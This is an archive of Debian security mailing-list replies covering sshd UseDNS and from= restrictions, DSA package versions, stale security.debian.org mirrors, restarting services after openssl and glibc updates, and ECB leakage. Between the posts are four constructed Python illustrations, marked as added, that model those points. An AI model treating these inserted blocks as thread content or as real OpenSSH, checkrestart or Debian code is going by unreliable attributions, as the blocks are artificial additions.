Re: failing ssh login attempts

2018-01-11 Thread Peter Ludikovsky
Hi!

The change was possibly introduced in the latest release, with the
change from OpenSSH 6.7 to OpenSSH 7.4. OpenSSH 6.8 set the option
UseDNS to default "no":

> *  sshd(8): UseDNS now defaults to 'no'. Configurations that match
>    against the client host name (via sshd_config or authorized_keys)
>    may need to re-enable it or convert to matching against addresses.

Source: https://www.openssh.com/txt/release-6.8

Regards,
/peter

Am 11.01.2018 um 17:44 schrieb Adam Weremczuk:
> Hi all,
> 
> I recently performed a series of distro upgrades starting from 7.1
> landing at 9.2.
> 
> I have a script running on another 7.1 machine which was connecting fine
> to 7.1 but now it fails after reading authorized_keys file as below:
> 
> 11437 read(4, "from=\"*.example.com\" ssh-rsa XX"..., 4096)
> = 4096
> 11437 getpid()  = 11437
> 11437 socket(AF_UNIX, SOCK_DGRAM|SOCK_CLOEXEC, 0) = 8
> 11437 connect(8, {sa_family=AF_UNIX, sun_path="/dev/log"}, 110) = 0
> 11437 sendto(8, "<38>Jan 11 16:21:32 sshd[11437]: Authentication tried
> for userx with correct key but not from a permitted host
> (host=192.168.XXX.XXX, ip=192.168.XXX.XXX)"..., 147, MSG_NOSIGNAL, NULL,
> 0) = 147
> 11437 close(8)
> 
> So I've tried, -vvv from the source, DEBUG3 on the destination and the
> strace above but can't see anything (such as reversed DNS lookup) apart
> from this single error message.
> 
> Connection is established fine when I replace *.example.com with an IP
> address but that's not very scalable.
> 
> Can somebody possibly put me in the right direction?
> 
> Regards
> Adam Weremczuk
> 



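Added illustration (not part of the thread, and not OpenSSH's code): a Python model of what that default change does to a from="*.example.com" restriction. With UseDNS no, sshd never performs the reverse lookup, so the only name it can match patterns against is the client address, and a host-name pattern can never match. The DNS tables, the 192.168.10.5 address, the name build1.example.com and the key material are constructed; fnmatch stands in for sshd's own glob matcher.

```python
import fnmatch
import re

# Constructed DNS tables standing in for the resolver sshd would consult.
PTR_RECORDS = {"192.168.10.5": "build1.example.com"}
A_RECORDS = {"build1.example.com": ["192.168.10.5"]}


def client_names(ip, use_dns, ptr_records=PTR_RECORDS, a_records=A_RECORDS):
    """Return the (host, ip) pair sshd matches 'from=' patterns against.

    UseDNS no: the reverse lookup is skipped and the "host name" is the IP.
    UseDNS yes: reverse lookup, kept only if a forward lookup of that name
    maps back to the connecting address (simulated with the tables above).
    """
    if not use_dns:
        return ip, ip
    name = ptr_records.get(ip)
    if name and ip in a_records.get(name, ()):
        return name, ip
    return ip, ip


def from_option_allows(pattern_list, host, ip):
    """Approximate sshd's 'from=' matching: comma-separated glob patterns
    ('*' and '?'), a leading '!' negates. A negated match denies outright;
    otherwise any positive match against host or IP allows."""
    allowed = False
    for pat in pattern_list.split(","):
        negate = pat.startswith("!")
        if negate:
            pat = pat[1:]
        if fnmatch.fnmatchcase(host, pat) or fnmatch.fnmatchcase(ip, pat):
            if negate:
                return False
            allowed = True
    return allowed


def from_pattern(authorized_keys_line):
    """Extract the from="..." option of one authorized_keys line, or None.
    The options field precedes the key type and contains no unquoted spaces."""
    opts = re.match(r'((?:"[^"]*"|[^\s"])*)', authorized_keys_line).group(1)
    m = re.search(r'(?:^|,)from="([^"]*)"', opts)
    return m.group(1) if m else None


def key_usable(authorized_keys_line, ip, use_dns):
    """Would this key line be accepted for a client connecting from ip?"""
    pattern = from_pattern(authorized_keys_line)
    if pattern is None:
        return True
    host, addr = client_names(ip, use_dns)
    return from_option_allows(pattern, host, addr)


if __name__ == "__main__":
    # Placeholder key material; only the from= option matters here.
    line = 'from="*.example.com" ssh-rsa AAAAB3NzaC1yc2EPLACEHOLDER deploy@build1'
    for use_dns in (True, False):
        print("UseDNS", "yes" if use_dns else "no ", "->",
              "accepted" if key_usable(line, "192.168.10.5", use_dns) else "not from a permitted host")
    print('address pattern, UseDNS no ->',
          key_usable('from="192.168.10.*" ssh-rsa AAAAPLACEHOLDER deploy', "192.168.10.5", False))
```

The address-pattern variant is the "convert to matching against addresses" option from the release note; re-enabling UseDNS instead means trusting the PTR and forward records of whoever runs the client's DNS.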


Re: What patches/packages to install for specific bugs.

2017-11-29 Thread Peter Ludikovsky
Hi,

You're mixing up versions, packages, and releases.

> DSA 3503 was fixed in Wheezy version 3.2.73-2+deb7u3

DSA-3503 was fixed in linux version 3.2.73-2+deb7u3

> dsa-3514 was fixed in Wheezy version 2:3.6.6-6+deb7u7

DSA-3514 was fixed in samba version 2:3.6.6-6+deb7u7

>  DSA 3511 was fixed in Wheezy version 1:9.8.4.dfsg.P1-6+nmu2+deb7u10

DSA 3511 was fixed in bind9 version 1:9.8.4.dfsg.P1-6+nmu2+deb7u10

et cetera

> I was told version newer than 3.14 might have fixes for them. But how to 
> compare version 3.2.73 to version :9.8.4.dfsg.P1-6+nmu2+deb7u10?  These 
> version numbers look strange. Thanks.

That's because the release (wheezy) doesn't have those version numbers,
those are the versions of the packages, which, since they're independent
software, progress from different points at different speeds.

> Will below commands apply patch for above bugs? These commands are very 
> helpful though. Thanks.
> 
> $ apt-get update
> $ apt-get -u upgrade
> $ apt-get -u dist-upgrade

apt-get update && apt-get upgrade will always apply the most current
security patches as long as you didn't explicitly turn off the security repo.

Regards,
/peter





Re: HTTPS needs to be implemented for updating

2016-12-18 Thread Peter Lawler
On 18/12/16 22:03, Christoph Moench-Tegeder wrote:

> second point requires a lot of work
> to resolve.
> 
> Regards,
> Christoph



Monday morning yet-to-be-caffeinated thoughts...

I'm going to ignore the 'inconvenience' because I think in this case 
that's a specious argument.


I acknowledge there's a bucketload of work to implement this. Just gets 
me to thinking, staging a switch over may be better. eg, a new apt 
config for https as either 'required' 'desired' and 'off'. This reduces 
the initial workload. Start with the default 'off', then at some future 
release move to 'desired' then 'required'.


Further, I suggest perhaps an automated survey of the major mirrors to 
find which ones already support https may be in order. Perhaps the 
resultant data could be used by the apt-transport-https package for now, 
as well as deciding when the above mentioned switch over might occur.


As I say, decaffeinated Monday morning thoughts.



Re: [SECURITY] [DSA 3547-1] imagemagick security update

2016-04-14 Thread Peter Palfrader
On Wed, 13 Apr 2016, Scott Blaydes wrote:

> >  (3) The scripts that automatically update the security rotation only
> >  check if a server is online and responds to http requests - it
> >  does not check if a mirror is current.

> > Expanding mini-nag[1] to do something about (3) would be nice too.
> 
> Who do we need to talk to about requirements and tasks to help out with
> things like this? I am not a coder, but would love to help out where I can.

mini-nag runs a limited set of nagios checks as configured in the
auto-dns hosts file.

So what we'd need is a nagios check that tells us for a given host
whether its (security) mirror is current.

Stop by in #debian-admin on OFTC if you want to help.

Cheers,
-- 
                            |  .''`.   ** Debian **
  Peter Palfrader           | : :' :   The  universal
  https://www.palfrader.org/ | `. `'    Operating System
                            |   `-     https://www.debian.org/



Re: [SECURITY] [DSA 3547-1] imagemagick security update

2016-04-14 Thread Peter Palfrader
On Wed, 13 Apr 2016, Alexander Neilson wrote:

> > (4) The nagios warning was missed in all the noise, and the relevant
> > teams are overworked and busy.
> 
> With mention to the above. Specifically (4). Is there a mailing list /
> group / volunteer place for people interested in helping with network
> operations? 

This is mostly handled by DSA (the debian system admin team) who are all
volunteers and do it in their spare time.  The IRC channel is #debian-admin
on OFTC.  There is a #debian-admin-bots that gets fed the nagios
warnings from https://nagios.debian.org/ (dsa-guest:*).

https://anonscm.debian.org/cgit/mirror/dsa-nagios.git/ has the nagios
config and checks.



Re: [SECURITY] [DSA 3547-1] imagemagick security update

2016-04-14 Thread Peter Palfrader
On Wed, 13 Apr 2016, Henrique de Moraes Holschuh wrote:

> On Wed, Apr 13, 2016, at 02:32, Peter Palfrader wrote:
> > There's also nothing inherently wrong with just having a single address
> > in an RRSet.
> 
> It means a single point of failure for that region:

A desynchronized set isn't any better.




Re: [SECURITY] [DSA 3547-1] imagemagick security update

2016-04-12 Thread Peter Palfrader
On Wed, 13 Apr 2016, Bjoern Nyjorden wrote:

> Given that this is not the first occurrence,

I think it is, actually.  As often is the case in the swiss-cheese
model, here all the holes lined up and the update of this security
mirror was delayed for about two days.

We can identify at least four causal factors.  Probably more, if we
look a bit further.
 (1) The scripts Debian uses to mirror repositories treat the mirroring
 hierarchy as a tree.  The failure of any node or link will cause
 the subtree(s) under the failed component to not receive updates.
 (2) There is an ongoing network outage between where the Australian
 mirror is and its upstream mirror in the US.
 (3) The scripts that automatically update the security rotation only
 check if a server is online and responds to http requests - it
 does not check if a mirror is current.
 (4) The nagios warning was missed in all the noise, and the relevant
 teams are overworked and busy.

>  what options does the Debian
> community have available to prevent this problem from arising again in the
> future?

Fixing (1) would be really nice.  It requires somebody to sit down and
design and implement something better.

Re (2), we are temporarily syncing the .au mirror from a different
machine while the network outage is being traced down by the relevant
NOCs.

Expanding mini-nag[1] to do something about (3) would be nice too.

Cheers,

[1]
  https://anonscm.debian.org/cgit/mirror/dsa-mini-nag.git/tree/
  also see
  https://anonscm.debian.org/cgit/mirror/dsa-auto-dns.git/tree/



Re: [SECURITY] [DSA 3547-1] imagemagick security update

2016-04-12 Thread Peter Palfrader
On Tue, 12 Apr 2016, Michael Stone wrote:

> On Tue, Apr 12, 2016 at 08:56:35PM -0300, Henrique de Moraes Holschuh wrote:
> >Then, maybe we should consider a better way to deal with areas where you
> >get only one choice out of geoip?
> 
> Reach out to the relevant team outlining your issues (e.g., lack of IPv6
> connectivity)? Advising people to hard code security mirrors isn't the right
> solution.

There's also nothing inherently wrong with just having a single address
in an RRSet.




Re: [SECURITY] [DSA 3547-1] imagemagick security update

2016-04-12 Thread Peter Palfrader
On Tue, 12 Apr 2016, Henrique de Moraes Holschuh wrote:

> We list several mirrors carrying debian security updates in
> https://www.debian.org/mirror/list-full

I think we shouldn't.

> We don't disclose which mirrors are members of the security.debian.org

https://anonscm.debian.org/cgit/mirror/dsa-auto-dns.git/tree/zones/security.debian.org.zone

is the file that the security.d.o zone is generated from.

> Alternate access URIs for several of the security.debian.org pool
> members *do* exist, but that information seems not to be clearly
> displayed anywhere.

They do?  Anything we actually tell people to use?

> A good starting point would be to provide a list of official security
> mirrors (potential members of the security.debian.org pool) that can be
> accessed directly when geo-ip is directing an user to a pool member that
> is stale.

No.  We derotate mirrors regularly for maintenance work.  We don't want
users to pick their security.d.o mirror.




Re: [SECURITY] [DSA 3547-1] imagemagick security update

2016-04-12 Thread Peter Palfrader
On Tue, 12 Apr 2016, Henrique de Moraes Holschuh wrote:

> On Tue, Apr 12, 2016, at 14:06, Adam D. Barratt wrote:
> > Judging from your e-mail address, I'm going to assume that the answer is 
> > that security.debian.org resolved to 150.203.164.61.
> > 
> > Apparently there was an issue with syncing to that mirror. The sysadmin 
> > team have triggered a manual sync, so things should be up-to-date now.
> 
> Other (leaf ?) .au mirrors also seem to be stale:
> mirror.aarnet.edu.au, mirror.cse.unsw.edu.au
> 
> Either those mirrors are not refreshing at an acceptable rate for
> something that carries /debian-security, or we have a wider issue than a
> single .au mirror missing a push.
> 
> We don't have leaf (non-push) mirrors in the geo-ip list for
> security.debian.org, do we?

We don't support 3rd party security mirrors.  In fact, we actively
discourage them.  Don't use them.




Re: Help

2016-03-07 Thread Peter Szabo

Probably with your mail client? :)

On 2016-03-07 11:51, Zack Piper wrote:

> This is the third message you've sent of this kind, is there actually
> anything you need help with?






Re: [SECURITY] [DSA 3500-1] openssl security update

2016-03-02 Thread Peter Ludikovsky
Hello,

Take a look at checkrestart [1] from the debian-goodies package. It
tells you which processes are using deleted files, and if possible which
service to restart.


Regards
/peter

[1] http://manpages.debian.org/cgi-bin/man.cgi?query=checkrestart

Am 02.03.2016 um 09:08 schrieb Carsten Aulbert:
> Hi
> 
> brief question for a possible addendum. I believe one should at least
> restart services which are currently using openssl after patching it,
> right, e.g. trying to figure out by lsof -n | grep openssl.
> 
> (or reboot the machine)
> 
> Would it make sense to add that to the DSA 3500-1 page, like for
> DSA-3481[1]?
> 
> Cheers
> 
> Carsten
> 
> [1] "While it is only necessary to ensure that all processes are not
> using the old glibc anymore, it is recommended to reboot the machines
> after applying the security upgrade."
> 
> 
> 



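Added example, not checkrestart's own code: the core of what such a tool checks, read directly from /proc/<pid>/maps. dpkg installs a new file and renames it over the old one rather than overwriting in place, so a process that still maps the old library keeps the unlinked inode open and the kernel lists it with a "(deleted)" suffix. The maps excerpts and process names below are constructed; the ignore list covers anonymous shared memory that is also reported as deleted but does not mean a stale binary.

```python
import os
import re

# Constructed /proc/<pid>/maps excerpts: one process still mapping a library
# that an upgrade replaced, one whose only deleted mappings are shared memory.
SAMPLE_PROCS = {
    1234: ("nginx", """\
7f3a2c400000-7f3a2c5a3000 r-xp 00000000 fd:01 131076   /usr/lib/x86_64-linux-gnu/libssl.so.1.0.0 (deleted)
7f3a2c5a3000-7f3a2c7a3000 ---p 001a3000 fd:01 131076   /usr/lib/x86_64-linux-gnu/libssl.so.1.0.0 (deleted)
7f3a2c9a0000-7f3a2cb5b000 r-xp 00000000 fd:01 131090   /lib/x86_64-linux-gnu/libc-2.19.so
7ffd4c1f0000-7ffd4c211000 rw-p 00000000 00:00 0        [stack]
"""),
    5678: ("postgres", """\
7f9c10000000-7f9c10800000 rw-s 00000000 00:04 98310    /dev/zero (deleted)
7f9c11000000-7f9c11004000 rw-s 00000000 00:04 98311    /SYSV00000000 (deleted)
7f9c12000000-7f9c12020000 rw-s 00000000 00:05 40       /memfd:shm (deleted)
"""),
}

# "(deleted)" mappings that are not files on disk and carry no upgrade signal.
IGNORE = re.compile(r"^(/dev/zero|/SYSV[0-9a-fA-F]+|/memfd:)")


def deleted_files(maps_text):
    """Set of on-disk paths this maps listing still references after they
    were unlinked, i.e. replaced by an upgrade while the process ran."""
    found = set()
    for line in maps_text.splitlines():
        fields = line.split(None, 5)
        if len(fields) < 6:
            continue                 # anonymous mapping, no path
        path = fields[5]
        if not path.endswith(" (deleted)"):
            continue
        path = path[:-len(" (deleted)")]
        if IGNORE.match(path):
            continue
        found.add(path)
    return found


def processes_to_restart(procs):
    """{pid: (comm, maps_text)} -> {pid: (comm, sorted deleted paths)}
    for every process that should be restarted."""
    result = {}
    for pid, (comm, maps_text) in procs.items():
        stale = deleted_files(maps_text)
        if stale:
            result[pid] = (comm, sorted(stale))
    return result


def read_live_procs():
    """Collect (comm, maps) for every readable process in the real /proc.
    Reading other users' maps requires root."""
    procs = {}
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            with open(f"/proc/{entry}/comm") as f:
                comm = f.read().strip()
            with open(f"/proc/{entry}/maps") as f:
                procs[int(entry)] = (comm, f.read())
        except OSError:
            continue                 # exited meanwhile, or not ours to read
    return procs


if __name__ == "__main__":
    # Runs on the constructed sample; use read_live_procs() on a real host.
    for pid, (comm, paths) in sorted(processes_to_restart(SAMPLE_PROCS).items()):
        print(f"{pid} {comm}: {', '.join(paths)}")
```

Mapping the process back to the service to restart is the part checkrestart adds on top; the maps walk alone already answers whether the old openssl (or glibc) is still in use.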


Re: [SECURITY] [DSA 3481-1] glibc security update

2016-02-16 Thread Peter Ludikovsky
Hello,

A question to those more knowledgeable: we're using our own DNS
servers for all lookups, and those do recursive lookup for any
external addresses. Am I right to assume that Bind9 uses its own
implementation for DNS lookups? Or are those now basically ticking
time bombs?

Regards,
Peter Ludikovsky

Am 16.02.2016 um 15:18 schrieb Salvatore Bonaccorso:
> Debian Security Advisory DSA-3481-1                   secur...@debian.org
> https://www.debian.org/security/                           Florian Weimer
> February 16, 2016                     https://www.debian.org/security/faq
> 
> Package: glibc
> CVE ID : CVE-2015-7547 CVE-2015-8776 CVE-2015-8778 CVE-2015-8779
> Debian Bug : 812441 812445 812455
> 
> Several vulnerabilities have been fixed in the GNU C Library,
> glibc.
> 
> The first vulnerability listed below is considered to have
> critical impact.
> 
> CVE-2015-7547
> 
> The Google Security Team and Red Hat discovered that the glibc host
> name resolver function, getaddrinfo, when processing AF_UNSPEC
> queries (for dual A/ lookups), could mismanage its internal
> buffers, leading to a stack-based buffer overflow and arbitrary
> code execution.  This vulnerability affects most applications which
> perform host name resolution using getaddrinfo, including system
> services.
> 
> CVE-2015-8776
> 
> Adam Nielsen discovered that if an invalid separated time value is
> passed to strftime, the strftime function could crash or leak 
> information.  Applications normally pass only valid time 
> information to strftime; no affected applications are known.
> 
> CVE-2015-8778
> 
> Szabolcs Nagy reported that the rarely-used hcreate and hcreate_r 
> functions did not check the size argument properly, leading to a 
> crash (denial of service) for certain arguments.  No impacted 
> applications are known at this time.
> 
> CVE-2015-8779
> 
> The catopen function contains several unbound stack allocations 
> (stack overflows), causing it to crash the process (denial of 
> service).  No applications where this issue has a security impact 
> are currently known.
> 
> While it is only necessary to ensure that all processes are not
> using the old glibc anymore, it is recommended to reboot the
> machines after applying the security upgrade.
> 
> For the stable distribution (jessie), these problems have been
> fixed in version 2.19-18+deb8u3.
> 
> For the unstable distribution (sid), these problems will be fixed
> in version 2.21-8.
> 
> We recommend that you upgrade your glibc packages.
> 
> Further information about Debian Security Advisories, how to apply 
> these updates to your system and frequently asked questions can be 
> found at: https://www.debian.org/security/
> 
> Mailing list: debian-security-annou...@lists.debian.org
> 





Re: Possible out of date mirrors of security.debian.org

2016-01-06 Thread Peter Palfrader
On Wed, 06 Jan 2016, Alex Brett wrote:

> Grabbing dists/jessie/updates/InRelease from each of these and
> looking at the Date header, two of them appear to be a few days out
> of date:
> InRelease.128.101.240.215:Date: Sun, 03 Jan 2016 20:01:14 UTC
> InRelease.128.31.0.63:Date: Wed, 06 Jan 2016 12:00:52 UTC
> InRelease.128.61.240.73:Date: Wed, 06 Jan 2016 12:00:52 UTC
> InRelease.149.20.20.19:Date: Sun, 03 Jan 2016 20:01:14 UTC
> 
> This has caused me to end up getting some hash sum mismatches by
> grabbing different bits from different IPs etc, so I imagine may be
> causing other people issues as well - is anybody able to resolve
> this?

Thanks for the report.  Fixed now, I think.

Cheers,
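Added example, not from the thread: the check Alex did by hand, written as the kind of nagios plugin Peter asks for in the mini-nag discussion above (a check that says, for a given host, whether its security mirror is current). It parses the Date field of InRelease, grades the age with the usual nagios exit codes, and separately flags a rotation whose members disagree, which is what produces the hash sum mismatches. The InRelease texts are constructed around the four Date values quoted above; the fetch path and the Host header are assumptions about how the mirrors are served.

```python
from datetime import datetime, timedelta, timezone
from email.utils import parsedate_to_datetime
import urllib.request

OK, WARNING, CRITICAL = 0, 1, 2          # nagios plugin exit codes


def fake_inrelease(date_str):
    """Constructed InRelease excerpt (the real file is a clear-signed Release)."""
    return ("-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n"
            "Origin: Debian\nLabel: Debian-Security\nSuite: stable\nCodename: jessie\n"
            f"Date: {date_str}\nArchitectures: amd64 i386\n")


# The four rotation members and Date values from the report above.
SAMPLE_MIRRORS = {
    "128.101.240.215": fake_inrelease("Sun, 03 Jan 2016 20:01:14 UTC"),
    "128.31.0.63":     fake_inrelease("Wed, 06 Jan 2016 12:00:52 UTC"),
    "128.61.240.73":   fake_inrelease("Wed, 06 Jan 2016 12:00:52 UTC"),
    "149.20.20.19":    fake_inrelease("Sun, 03 Jan 2016 20:01:14 UTC"),
}
# Constructed "now": roughly when the report was written.
REPORT_TIME = datetime(2016, 1, 6, 12, 30, tzinfo=timezone.utc)


def inrelease_date(text):
    """The InRelease 'Date:' field as an aware UTC datetime."""
    for line in text.splitlines():
        if line.startswith("Date:"):
            stamp = parsedate_to_datetime(line[len("Date:"):].strip())
            if stamp.tzinfo is None:     # naive result: the field is UTC anyway
                stamp = stamp.replace(tzinfo=timezone.utc)
            return stamp.astimezone(timezone.utc)
    raise ValueError("no Date: field in InRelease")


def check_mirror(text, now, warn_after=timedelta(hours=12), crit_after=timedelta(days=1)):
    """Nagios-style staleness grade for one mirror: (state, age)."""
    age = now - inrelease_date(text)
    if age >= crit_after:
        return CRITICAL, age
    if age >= warn_after:
        return WARNING, age
    return OK, age


def desynchronized(mirrors):
    """True when rotation members serve different InRelease Dates, so a client
    that hits different IPs for different files gets inconsistent indexes."""
    return len({inrelease_date(t) for t in mirrors.values()}) > 1


def fetch_inrelease(ip, path="/debian-security/dists/jessie/updates/InRelease"):
    """Fetch by IP, keeping the Host header the mirror's vhost expects."""
    req = urllib.request.Request(f"http://{ip}{path}",
                                 headers={"Host": "security.debian.org"})
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read().decode("utf-8", "replace")


if __name__ == "__main__":
    worst = OK
    for ip, text in SAMPLE_MIRRORS.items():
        state, age = check_mirror(text, REPORT_TIME)
        worst = max(worst, state)
        print(f"{ip}: state {state}, InRelease age {age}")
    print("rotation desynchronized:", desynchronized(SAMPLE_MIRRORS))
    raise SystemExit(worst)
```

Graded this way the two three-day-old members come back CRITICAL and the set as a whole is reported desynchronized, which is the signal the auto-dns scripts would need to derotate a member instead of only checking that it answers HTTP.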



Re: [syscom] [SECURITY] [DSA 3375-1] wordpress security update

2015-10-20 Thread Peter Barfuss

lol again

well I guess it *is* Tuesday

On Mon, 19 Oct 2015, Yves-Alexis Perez wrote:


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-3375-1   secur...@debian.org
https://www.debian.org/security/Yves-Alexis Perez
October 19, 2015  https://www.debian.org/security/faq
- -

Package: wordpress
CVE ID : CVE-2015-5714 CVE-2015-5715
Debian Bug : 799140

Several vulnerabilities have been fixed in Wordpress, the popular
blogging engine.

CVE-2015-5714

   A cross-site scripting vulnerability when processing shortcode tags
   has been discovered.

   The issue has been fixed by not allowing unclosed HTML elements in
   attributes.

CVE-2015-5715

   A vulnerability has been discovered, allowing users without proper
   permissions to publish private posts and make them sticky.

   The issue has been fixed in the XMLRPC code of Wordpress by not
   allowing private posts to be sticky.

Other issue(s)

  A cross-site scripting vulnerability in user list tables has been
  discovered.

  The issue has been fixed by URL-escaping email addresses in those
  user lists.

For the oldstable distribution (wheezy), these problems will be fixed
in later update.

For the stable distribution (jessie), these problems have been fixed in
version 4.1+dfsg-1+deb8u5.

For the testing distribution (stretch), these problems have been fixed
in version 4.3.1+dfsg-1.

For the unstable distribution (sid), these problems have been fixed in
version 4.3.1+dfsg-1.

We recommend that you upgrade your wordpress packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v2

iQEcBAEBCgAGBQJWJU/4AAoJEG3bU/KmdcClwJkH+wbyIKtik3ASrpO/TqULYail
PYwhsEcb58PjFLn5IEqvXXaAi6FANhcllNwennROd5rqNvSZjPNXjkHge+PV64RO
T1rsT4G1MnM2e9CQvRzT3HQP0JC3u/79IvDkGsUfJjMbG/juBcZH4F69VHD/hN8x
rg9ChCEkKjAKAgJIfVU95H4N64iYEsbuRA9d6gJTGqfOw6KcSdNgpeQVRUSn1pjV
ZxabKmG6NFdFaKjo6Ql1FN9yg5bY0u2rNVH7exR+ce19H5N4QY22yqdF5iMNmYb+
3F6UgfTjYXV3PYoyPkoYTbdpcopoWQpCjh/dasjyX0yD06O9F2fW4Ht6UUOxbw8=
=sToZ
-END PGP SIGNATURE-






Re: the calculus of encrypting non-textual data

2014-07-08 Thread Peter Makholm
Joel Rees  writes:

>>> Did you know that encrypting a picture sometimes results in a picture
>>> that looks like it has been through a random color-permuting filter?
>>
>> Can you prove it?
>
> Memory of coursework in encryption. The professor did some simple
> encryption on uncompressed images and showed how the results tended
> not to hide the things one would want hidden.

Encrypting uncompressed images (bitmaps) in ECB mode tends to reveal a
lot of the structure of the image. There is an example at wikipedia:

  http://en.wikipedia.org/wiki/ECB_mode#Electronic_codebook_.28ECB.29

This just illustrates that using ECB mode is really not any better than
any other form of simple substitution cipher even though the underlying
cipher is considered cryptographically strong.

I don't think 'simple encryptions of uncompressed data' is useful for
anything than an argument for doing it right.

> Then he pointed out that the parts of an image with the most
> information are the parts that are least likely to compress. And he
> pointed out that standard encryption methods tend to be byte-oriented,
> for speed.

I think block ciphers are the most common norm these days with 128 bits
being the most popular block size. But even more important is the
increased focus on how ciphers are applied to the plaintext in ways that
don't leak structural information like ECB mode does.

//Makholm
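Added demonstration, not from the thread: the Wikipedia image experiment in code. A stand-in for the block cipher (HMAC-SHA256 of the block, truncated to 16 bytes: deterministic per key and block, which is the only property the ECB leak depends on, but not a real cipher and not invertible) encrypts a constructed 64x64 bitmap in ECB and in CBC. Counting distinct ciphertext blocks and rendering one character per block shows the square surviving ECB and disappearing under CBC.

```python
import hashlib
import hmac
import os

BLOCK = 16
WIDTH, HEIGHT = 64, 64               # constructed 64x64 one-byte-per-pixel bitmap


def block_encrypt(key, block):
    """Toy stand-in for one block-cipher encryption (keyed PRF, 16-byte
    output). Equal inputs give equal outputs, as with any block cipher."""
    assert len(block) == BLOCK
    return hmac.new(key, block, hashlib.sha256).digest()[:BLOCK]


def ecb_encrypt(key, plaintext):
    """ECB: every block encrypted independently, so equal plaintext blocks
    produce equal ciphertext blocks."""
    return b"".join(block_encrypt(key, plaintext[i:i + BLOCK])
                    for i in range(0, len(plaintext), BLOCK))


def cbc_encrypt(key, iv, plaintext):
    """CBC: each block is XORed with the previous ciphertext block (the IV
    for the first) before encryption, so repeats in the plaintext are hidden."""
    out, prev = [], iv
    for i in range(0, len(plaintext), BLOCK):
        chained = bytes(p ^ c for p, c in zip(plaintext[i:i + BLOCK], prev))
        prev = block_encrypt(key, chained)
        out.append(prev)
    return b"".join(out)


def make_bitmap():
    """0x00 background with a 0xFF filled square from (16,16) to (47,47)."""
    rows = []
    for y in range(HEIGHT):
        row = bytearray(WIDTH)
        if 16 <= y < 48:
            row[16:48] = b"\xff" * 32
        rows.append(bytes(row))
    return b"".join(rows)


def distinct_blocks(ciphertext):
    return len({ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)})


def render(ciphertext):
    """One text row per image row, one character per ciphertext block:
    '.' for the first distinct block seen, '#' for the second, '?' otherwise."""
    symbols, lines = {}, []
    per_row = WIDTH // BLOCK
    for y in range(HEIGHT):
        chars = []
        for bx in range(per_row):
            off = (y * per_row + bx) * BLOCK
            blk = ciphertext[off:off + BLOCK]
            if blk not in symbols:
                symbols[blk] = ".#"[len(symbols)] if len(symbols) < 2 else "?"
            chars.append(symbols[blk])
        lines.append("".join(chars))
    return lines


if __name__ == "__main__":
    key, iv = os.urandom(16), os.urandom(16)   # CBC needs a fresh random IV per message
    image = make_bitmap()
    ecb, cbc = ecb_encrypt(key, image), cbc_encrypt(key, iv, image)
    print("distinct blocks: ECB", distinct_blocks(ecb), "CBC", distinct_blocks(cbc))
    for row in render(ecb)[::8]:
        print("ECB", row)                        # the square is still visible
    for row in render(cbc)[::8]:
        print("CBC", row)
```

With 256 blocks in the image, ECB yields exactly two distinct ciphertext blocks (background and square), which is the "simple substitution cipher" Makholm describes: the key hides the pixel values, not where the pixels are. CBC yields 256 distinct blocks, and no picture.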


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: https://lists.debian.org/87tx6r99xv@vps1.hacking.dk



Re: Debian mirrors and MITM

2014-05-31 Thread Peter Palfrader
On Fri, 30 May 2014, Joey Hess wrote:

> Alfie John wrote:
> > Taking a look at the Debian mirror list, I see none serving over HTTPS:
> > 
> >   https://www.debian.org/mirror/list
> 
> https://mirrors.kernel.org/debian is the only one I know of.
> 
> It would be good to have a few more, because there are situations where
> debootstrap is used without debian-archive-keyring being available, and
> recent versions of debootstrap try to use https in that situation, to at
> least get the weak CA level of security.

That doesn't buy you anything.  Mirrors, even if you trusted them, don't
use authenticated syncing protocols.



Archive: https://lists.debian.org/20140531091020.gp20...@anguilla.noreply.org



Re: NSA software in Debian

2014-01-24 Thread Peter Lawler

On 25/01/14 00:17, Andrew McGlashan wrote:

> It's virtually impossible to know one way or
> another, we just have to have some faith and trust (perhaps too much of
> one or both).


FWIW, agreed.

To lightly misquote a network engineering mate of mine...

"Not entirely sure why anyone (unquestionably) trusted (any system they 
haven't hand built from the PSU to the VDU) in the first place.

http://cm.bell-labs.com/who/ken/trust.html "

Cheers,

Pete.


Archive: http://lists.debian.org/52e2c257.2040...@bleeter.id.au



Default root password, username/password

2013-02-04 Thread Peter Lawler

G'day,
Yes, I know I really should research this a bit more. I beg forgiveness, 
as I've got medical appointments over the next few days and really 
genuinely don't have time right now (for those who were at the 
Bluehackers BoF at Linux.conf.au last week will hopefully understand).


What I'd like to know is about the default root password and default 
username/password pairs on the wheezy installer (for this is the version 
I'm running as my 'introduction' to Debian).


It would seem to me that accepting 'password' and 'rootpassword' for the 
root user during the install phase we'd accept, albeit grudgingly, last 
century and is somewhat unforgivable in the second decade of this one. 
Similarly, that the default user can have the same password as the 
username seems very poor.


As I remarked to others on an IRC channel this morning, it's very handy 
for short lived VM's but that's about the only functionality that I 
believe it's excusable for. Is there a technical reason this 'ability' 
still exists?


Regards,

Peter Lawler.



Archive: http://lists.debian.org/51103490.1090...@bleeter.id.au



Re: Linux 3.2 in wheezy

2012-01-30 Thread Peter Samuelson

[Brad Spengler]
> Frankly it makes more sense for me to offer .debs myself than to deal
> with a bureaucracy and non-standard kernel in Debian.  It contains
> who-knows-what extra code, and I doubt anyone looked at any of it to
> see if it allows for some way to leak information I prevent against a
> vanilla kernel, or a way to bypass any other existing protection.

I hope you aren't complaining that the Debian kernel team doesn't
include your patch, and also complaining that Debian kernel team
includes too many patches, in the same email.

Probably that isn't what you tried to say, but that's kinda what it
sounded like.

Peter


Archive: http://lists.debian.org/20120130154049.ga2...@p12n.org



Re: security updates using ftp

2011-08-30 Thread Peter Palfrader
On Tue, 30 Aug 2011, Nelson Last wrote:

> deb ftp://130.89.149.226/debian squeeze main
> deb ftp://128.31.0.36/debian-security/ squeeze/updates main

Please realize that none of this is guaranteed to remain working.

